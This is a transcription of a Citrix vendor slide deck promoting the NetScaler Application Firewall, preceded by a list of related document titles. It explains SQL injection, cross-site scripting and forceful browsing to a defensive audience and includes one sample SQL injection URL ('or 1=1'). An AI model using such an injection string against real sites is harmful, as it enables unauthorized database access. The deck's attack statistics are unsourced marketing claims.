Protecting Web Application Delivery with Citrix Application Firewall. Johnson Mok Systems Engineer Citrix Systems, Inc.

Similar documents
WHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats

Advanced Administration for Citrix NetScaler 9.0 Platinum Edition

HIPAA Compliance and Web Application Security. Tom Bennett Vice President, Teros Inc.

Agenda 網 站 安 全 威 脅 及 保 護 應 用 介 紹 2009/3/24. 林 立 棕, David Lin. Security for HTML Applications. Demo - HTML Application Attacks

ArcGIS Server Security Threats & Best Practices David Cordes Michael Young

CNS-301-3I ~ Citrix NetScaler 11 Advanced Implementation

The monsters under the bed are real World Tour

Web App Security Audit Services

Web Application Security. Radovan Gibala Senior Field Systems Engineer F5 Networks

WEB APPLICATION FIREWALLS: DO WE NEED THEM?

The Top Web Application Attacks: Are you vulnerable?

Barracuda Web Site Firewall Ensures PCI DSS Compliance

Where every interaction matters.

What is Web Security? Motivation

Securing Your Web Application against security vulnerabilities. Ong Khai Wei, IT Specialist, Development Tools (Rational) IBM Software Group

Barracuda Web Application Firewall vs. Intrusion Prevention Systems (IPS) Whitepaper

Passing PCI Compliance How to Address the Application Security Mandates

Web Engineering Web Application Security Issues

FINAL DoIT v.4 PAYMENT CARD INDUSTRY DATA SECURITY STANDARDS APPLICATION DEVELOPMENT AND MAINTENANCE PROCEDURES

Table of Contents. Page 2/13

White Paper. Guide to PCI Application Security Compliance for Merchants and Service Providers

Basic & Advanced Administration for Citrix NetScaler 9.2

Rational AppScan & Ounce Products

MatriXay WEB Application Vulnerability Scanner V Overview. (DAS- WEBScan ) The best WEB application assessment tool

WHITE PAPER. FortiWeb Web Application Firewall Ensuring Compliance for PCI DSS 6.5 and 6.6

Enterprise Cybersecurity Best Practices Part Number MAN Revision 006

Contemporary Web Application Attacks. Ivan Pang Senior Consultant Edvance Limited

STOPPING LAYER 7 ATTACKS with F5 ASM. Sven Müller Security Solution Architect

The Weakest Link: Mitigating Web Application Vulnerabilities. webscurity White Paper. webscurity Inc. Minneapolis, Minnesota USA

Using Free Tools To Test Web Application Security

IJMIE Volume 2, Issue 9 ISSN:

3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management

What s Wrong with Information Security Today? You are looking in the wrong places for the wrong things.

WHITE PAPER FORTIWEB WEB APPLICATION FIREWALL. Ensuring Compliance for PCI DSS 6.5 and 6.6

Detecting Web Application Vulnerabilities Using Open Source Means. OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008

Out of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet

WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY

Importance of Web Application Firewall Technology for Protecting Web-based Resources

The Key to Secure Online Financial Transactions

Information Technology Policy

Gateway Security at Stateful Inspection/Application Proxy

WEB SECURITY. Oriana Kondakciu Software Engineering 4C03 Project

Application Security Testing

New IBM Security Scanning Software Protects Businesses From Hackers

Web Application Vulnerabilities and Avoiding Application Exposure

F5 ASM i DB Monitoring w ofercie NASK

WhiteHat Security White Paper. Top 11 PCI DSS 3.0 Changes That Will Affect Your Application Security Program

Thick Client Application Security

IBM Protocol Analysis Module

Web Application Security

Web Application Penetration Testing

Application Security WHY NETWORK FIREWALLS AND INTRUSION PREVENTION SYSTEMS AREN T ENOUGH

WEB APPLICATION SECURITY

Web Application Report

Arrow ECS University 2015 Radware Hybrid Cloud WAF Service. 9 Ottobre 2015

THE HACKERS NEXT TARGET

OWASP and OWASP Top 10 (2007 Update) OWASP. The OWASP Foundation. Dave Wichers. The OWASP Foundation. OWASP Conferences Chair

Simple Steps to Securing Your SSL VPN

ETHICAL HACKING APPLICATIO WIRELESS110 00NETWORK APPLICATION MOBILE MOBILE0001

Bad Romance: Three Reasons Hackers <3 Your Web Apps & How to Break Them Up

Don t Get Burned! Are you Leaving your Critical Applications Defenseless?

Evolutionism of Intrusion Detection

Web Application Vulnerabilities - A Primer

Overview of the Penetration Test Implementation and Service. Peter Kanters

FINAL DoIT v.8 APPLICATION SECURITY PROCEDURE

Common Security Vulnerabilities in Online Payment Systems

Achieving PCI Compliance Using F5 Products

Secure Web Application Coding Team Introductory Meeting December 1, :00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda

Web Application Security

Security Testing. Vulnerability Assessment vs Penetration Testing. Gabriel Mihai Tanase, Director KPMG Romania. 29 October 2014

Security threats and attackers are turning

SAST, DAST and Vulnerability Assessments, = 4

Reducing Application Vulnerabilities by Security Engineering

Integrated Protection for Systems. João Batista Territory Manager

elearning for Secure Application Development

FortiWeb 5.0, Web Application Firewall Course #251

Sitefinity Security and Best Practices

Your Web and Applications

Web Application Security 101

Web application security Executive brief Managing a growing threat: an executive s guide to Web application security.

Are you fighting new threats with old weapons? Secure your Web applications with Web Application Firewalls.

Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs

05.0 Application Development

Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security

Application Layer Encryption: Protecting against Application Logic and Session Theft Attacks. Whitepaper

External Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION

National Information Security Group The Top Web Application Hack Attacks. Danny Allan Director, Security Research

Table of Contents. Application Vulnerability Trends Report Introduction. 99% of Tested Applications Have Vulnerabilities

Protecting against DoS/DDoS Attacks with FortiWeb Web Application Firewall

Creating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011

Web Intrusion Detection with ModSecurity. Ivan Ristic

CYBERTRON NETWORK SOLUTIONS

White Paper. McAfee Web Security Service Technical White Paper

External Supplier Control Requirements

OWASP AND APPLICATION SECURITY

How to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering

The New PCI Requirement: Application Firewall vs. Code Review

Magento Security and Vulnerabilities. Roman Stepanov

Application Security Best Practices. Wally LEE Principal Consultant

Integrating Security Testing into Quality Control

Transcription:

Protecting Web Application Delivery with Citrix Application Firewall Johnson Mok Systems Engineer Citrix Systems, Inc.

Six Keys to Successful App Delivery Optimizing Web Application Delivery Citrix NetScaler Deliver Web Applications Citrix Presentation Server Deliver Windows Applications Users Citrix EdgeSight Citrix WANScaler Monitor End User Experience Accelerate Apps to Branch Users Citrix Access Gateway Enable Secure Application Access Apps Citrix Desktop Server Deliver Desktops 2

Agenda From Hacker to Criminal Attacks Vulnerabilities and Attacks Effective Defense Your Firewall and IPS Vendor Isn t Telling You NetScaler Product Family 3

Agenda From Hacker to Criminal Attacks Vulnerabilities and Attacks Effective Defense Your Firewall and IPS Vendor Isn t Telling You NetScaler Product Family 4

Business Impact is Far Greater Traditional Network Attacks Most security products focused here Target is viruses, worms, spam, etc. Highly visible, annoying, messy Cost is lost productivity and clean-up Web Application Attacks Attacks with Criminal Intent Target is data behind apps Financial data, identity info Financial implication far bigger 5

Web Application Attack Trends Web Infrastructure provides a vulnerable link to sensitive data Credit Card #s Social Security #s Employee Data Healthcare Records Transaction History The web threat is growing 73% of web vulnerabilities ranked easy to exploit 90% increase in reported web attacks last year 75% of attacks target application vulnerabilities Government acts on privacy and security Gramm-Leach-Bliley Act California SB 1386 Basel II Information Privacy Acts 6

Agenda From Hacker to Criminal Attacks Vulnerabilities and Attacks Effective Defense Your Firewall and IPS Vendor Isn t Telling You NetScaler Product Family 7

Web Application Security Protects 16 of 16 application vulnerability classes Protects 10 of 10 OWASP Top Ten Open Web Application Security Project (OWASP) ALL IIS web vulnerabilities: Automatically Protected ALL web worms - Code Red, Nimda, : Automatically Protected Vulnerability Score Card 1 Buffer Overflow Exploits 2 CGI-BIN Param Manipulation Form/Hidden Field 3 Manipulation 4 Forceful Browsing 5 Cookies/Session Poisoning Broken ACLs / Weak 6 Passwords 7 Cross-site Scripting (XSS) 8 Command Injection 9 SQL Injection Error Triggering 10 Sensitive Information Leaks 11 Insecure use of Crypto 12 Server Misconfiguration 13 Backdoors & Debug Options 14 Web-site Defacement Well-known Platform 15 Vulnerabilities 16 Unpublished Attacks 8

What Is An Application Attack? Malicious Request (but valid) Web Servers Programming Error Complete Customer Records Malicious Database Request 9

The Top 3 Web App Attacks 1. Cross Site Scripting (77% sites vulnerable) ID theft, phishing, password stealing 2. Command Injection Database theft 3. Web Denial of Service (WebDoS) Online extortion 10

SQL Injection Attacks Accessing databases via web applications SQL Injection Attack http://shop/index.asp?category=books' or 1=1 SQL Injection Attack Sending SQL commands to a Web application that when passed to databases execute and allow hacker to gain access or change customer and sensitive information. 11

Cross-Site Scripting Attacks Attacking trust relationships 1 Hacker posts <malicious script> to vulnerable Web application 3 Script captures credential info and sends to hacker 2 Innocent user downloads script and executes Cross-Site Scripting (XSS) Attack Inserting a malicious script enabling identity-theft by the attacker, compromising the trust relationship between a user and a Web application. 12

Forceful Browsing Brute-force penetration of the infrastructure Blogger Wild Bill Kerr investigating the Foley Scandal ABC thought it had deleted from the site the AOL Screen name of a page who received messages from the congressman. By altering the [web page] address, the blogger gained access to the name which still existed on an older version of the [site]. Wall Street Journal, Oct 16, 2006 Forceful Browsing Attack Manipulating request URLs to gain access to content you are not entitled to see. 13

Agenda From Hacker to Criminal Attacks Vulnerabilities and Attacks Effective Defense Your Firewall and IPS Vendor Isn t Telling You NetScaler Product Family 14

Defense Strategies Do nothing and hope for the best Pre-emptive patching against known vulnerabilities Reactive patching against unknown/new vulnerabilities Server-based protections Appliance-based protections 15

Citrix NetScaler 8.0 Citrix Application Firewall Effective defense against application-layer attacks Hardened security appliance High-performance security for Web and Web Services Positive security model - no signatures! Advanced application learning Simple browser-based policy management Advance DDoS Protection 16

Positive Security Offers Zero-Day Defense Only legal (safe) client requests are forwarded to the application Client requests violating best practices and HTTP RFCs are blocked Application Infrastructure Benefits of Positive Security No attack signature databases to maintain Protects application and application logic Real-time protection for known and unknown attacks 17

Defense Demands Full Request Inspection Looking deeper into every frame RFC-compliant content can be dangerous! More intelligence yields more defense. Application Infrastructure Benefits of comprehensive request inspection Buffer overflow protection Cross-site scripting (XSS) protection SQL Injection protection URL mapping eases administration of complex sites 18

Defense Demands Session Awareness And Bi-directional Inspection Served content is memorized on a per-session basis. Client requests not matching served content are blocked Application Infrastructure Benefits of Session Awareness Form-field protection Forceful browsing protection Cookie Poisoning protection 19

Defend Against Encrypted Attacks! Cannot defend against what cannot be seen Encryption terminated at Firewall Optional re-encryption back to servers Application Infrastructure Benefits of SSL Decryption and Encryption Full defense against encrypted attacks Increase web infrastructure performance with SSL offload 20

Complex Web Applications Require Learning Enhancing positive security model to prevent false positives Positive Security Model and Sessionization Ensure What is served must be returned unmodified Modern Web Applications serve JavaScript, Which intentionally modify cookies, fields, etc. Application learning tunes positive security model Eliminating false positives by learning permitted changes 21

22

23

24

Agenda From Hacker to Criminal Attacks Vulnerabilities and Attacks Effective Defense Your Firewall and IPS Vendor Isn t Telling You NetScaler Product Family 25

Traditional Network Security Traditional network security is focused on stopping automated attacks such as worms and viruses at the network perimeter The goal of these attacks is to disrupt by exploiting known vulnerabilities in known systems Traditional security products stop these attacks by creating new signatures each time a new hole is discovered Worms Viruses Network Attacks!! Network Firewalls IPS and Anti Virus Web Servers OS Application Servers and Packaged Apps OS Network Database Servers OS 26

The Web Application Threat Most targeted hacker activity today, however, focuses on customized web apps which are extremely hard to write securely Traditional methods do little to stop these attacks since you cannot write patches or signatures for customized code These threats are far more dangerous because they give untraceable access to data (financial, identity, credit cards, etc) 75% of targeted attacks now target web applications Worms Viruses Network Attacks Network Firewalls IPS and Anti Virus Customized Web Applications Customized Packaged Apps Internally Developed Web Applications NO SIGNATURES WebNO PATCHES Servers App Servers Packaged Apps Database Servers OS OS OS Network DATA 27

Web Application Firewalls Web Application Firewalls protect data by blocking known and unknown attacks in underlying platforms and customized code Targeted Attacks on Sensitive Data Worms Viruses Network Attacks Network Firewalls Web App Firewalls IPS and Anti Virus Customized Web Applications Customized Packaged Apps Internally Developed Web Applications Web Servers OS App Servers Packaged Apps OS Network Database Servers OS DATA 28

Network Firewalls vs. Application Firewalls Open for Business = Open to Attack Network Firewalls Protect at Layer 3 Forward Approved Packets Specifically configured to be open on TCP ports 80/443 (HTTP/HTTPS) No awareness of HTTP/S Sessions Application Firewalls Protect at Layer 7 Block Attacks Bi-directional inspection Fully session-aware Protects web application logic and infrastructure from malicious attacks and erroneous disclosures 29

IPS / IDS vs. Application Firewalls Negative security = vulnerable on day zero Intrusion Detection and Intrusion Prevention Systems (IDS / IPS) Negative Security Model based on Signatures Zero-day attack vulnerable Application Firewalls Positive Security Model enforces correct behavior Every day attack prevention No awareness of HTTP/S Sessions Typically no SSL decryption Cannot discover attacks in SSL sessions Aware of URLs, cookies, and form fields in sessions Full SSL Decryption Can see all attacks Full Proxy architecture 30

Financial Services Insurance AIG Guardian Healthcare egovernment ecommerce 31

32

2024 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information